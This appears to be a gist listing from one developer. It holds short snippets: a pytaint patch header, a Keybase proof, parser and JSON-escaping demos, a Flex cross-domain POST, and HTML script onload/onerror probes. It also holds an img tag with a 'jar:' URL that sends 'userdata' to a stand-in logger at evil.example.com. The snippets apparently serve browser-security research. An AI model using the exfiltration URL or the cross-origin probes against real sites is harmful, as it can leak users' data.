JordanMilne

From 2aea5633663dd0b91d55a80a17ad22edfb23731f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Felix=20Gr=C3=B6bert?= <groebert@google.com>
Date: Mon, 7 Oct 2013 15:44:48 +0200
Subject: [PATCH 1/9] pytaint patch

---
 Include/Python.h              |    3 +
 Include/meritobject.h         |   28 +
 Include/pyerrors.h            |    1 +
 Include/stringobject.h        |   53 +-

JordanMilne

Keybase proof

I hereby claim:

• I am jordanmilne on github.
• I am largenocream (https://keybase.io/largenocream) on keybase.
• I have a public key whose fingerprint is D39D AEC8 56F2 2C2B A0ED BFC6 BADF 89BE FF6F 9ED3

To claim this, I am signing this object:

JordanMilne

LF

$ ./stmd --ast foo.md 
document
  paragraph
    str "Normal paragraph"
  paragraph
    str "Paragraph 2"
  paragraph
    str "foo "

JordanMilne

>>> import simplejson
>>> print simplejson.dumps({"foo<>":"<>bar&"}, cls=simplejson.JSONEncoderForHTML)
{"foo\u003c\u003e": "\u003c\u003ebar\u0026"}

JordanMilne

<?xml version="1.0"?>
<s:Application xmlns:fx="http://ns.adobe.com/mxml/2009" xmlns:mx="library://ns.adobe.com/flex/mx" xmlns:s="library://ns.adobe.com/flex/spark" >
    <fx:Script><![CDATA[
    import flash.net.*;

    public function sendStuff():void
    {
	var r:URLRequest = new URLRequest('http://www.youtube.com/foo');
	r.method = 'POST';
	r.data = '{wow what a great post body}';

JordanMilne

 <script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>

JordanMilne

<img src="jar:http://evil.example.com/logger?userdata=whatever!/foobar" />

JordanMilne

<html>
  <body>
    <script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>
    <script src="http://doesntexist.example.com" onload="javascript:alert('universe exploded')" onerror="javascript:alert('doesntexist failed to load as expected')"></script>
  </body>
</html>